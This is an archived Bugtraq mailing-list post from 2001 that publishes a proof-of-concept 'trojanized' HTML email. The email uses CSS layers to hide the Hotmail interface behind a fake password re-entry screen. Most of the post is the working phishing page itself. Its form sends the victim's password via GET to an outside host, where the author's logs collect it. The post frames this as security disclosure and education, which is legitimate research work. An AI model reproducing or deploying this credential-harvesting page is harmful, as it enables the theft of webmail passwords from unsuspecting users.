[18841] in bugtraq
spoofing hotmail with css (exploit)
daemon@ATHENA.MIT.EDU (gregory duchemin)
Mon Jan 29 02:19:54 2001
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id: <F1913XIhFTN6BtOdKMn00001196@hotmail.com>
Date: Fri, 26 Jan 2001 18:28:17 -0000
Reply-To: gregory duchemin <c3rb3r@HOTMAIL.COM>
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Some people around here asked me for an exploit, so this is the proof of
concept for css hotmail spoofing/ password recovery.
To use it, just mail it to yourself not others.
All graphics were made by the author to explicitly show it is not the real
hotmail relogin page and thus preventing any abuse and copyright violation.
did work fine with MSIE, would need some little changes to work on Netscape.
Be warnned when hotmail ask u next time ;)
Cheers,
Gregory Duchemin
<html>
<!-- H0RSEM4IL.c0m , trojanized mail to catch users password.
A proof of concept for most of web based mailer.
Tested on Hotmail with msie.
To try it, just mail this page to an hotmail mailbox but remember
This page is for educational purposes ONLY !
-->
<body>
<div align="left">
<div id="layer1" style="width:1280px; height:768px; position:absolute;
left:0px; top:0px; z-index:0;">
<!-- First Layer, a big blank screen to hide Hotmail desk -->
<div id="layer2" style="position:absolute; left:40; top:100;
z-index:0;">
<!-- Layer 2, will show up the near to original hotmail re-enter
password screen ;) -->
<!-- Here we have slightly modified the orignal hotmail login.html
to point
on our own site with GET method to catch password in our logs
-->
<form name="passwordform" target="layer2"
action="http://c3rber.multimania.com/merci.txt" method="GET" target="_top"
AUTOCOMPLETE="OFF" >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="javascript:void()" target="_top"><img
src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60
border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44
border=0 alt="Find Out More About Passport"><br>
<a href="javascript:void()" target="_top"><font class="f"
size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your
password at your own risk</b></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0
cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">
</font>
</td>
<td rowspan=4><font class="s">
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class="f" size=2><b><victim@hotmail.com></b></font>
<input type="hidden" name="domain" value="hotmail.com">
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle"><font
class="sbd">Password</font> </td>
<td><input type="password" name="passwd" size="16"
maxlength="16"></td>
<td width=22 valign="middle" align="center"> </td>
<td><input type="submit" name="enter" value="Sign in"></td>
</tr>
<tr>
<td></td>
<td colspan="2"><font class="f" size=2><b><a
href="javascript:void()" target="_top">Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
<font class="s">Fake © 2001 P0w3rsoft Corporation. All rights
not reserved.</font>
<a href="javascript:void()">H0rsemail TERMS OF USE and
NOTICES</font></a>
<a href="javascript:void()"><font class="s">untrusted Privacy
Statement</font></a>
</td>
</tr>
</table>
</div>
<p align="center">
<img src="http://c3rber.multimania.com/hotmail.jpg" width="1280"
height="950" border="0" >
</div>
</div>
</body>
<--
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
Original idea : Ben Li <bali@THOCK.COM>
-->
</html>
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
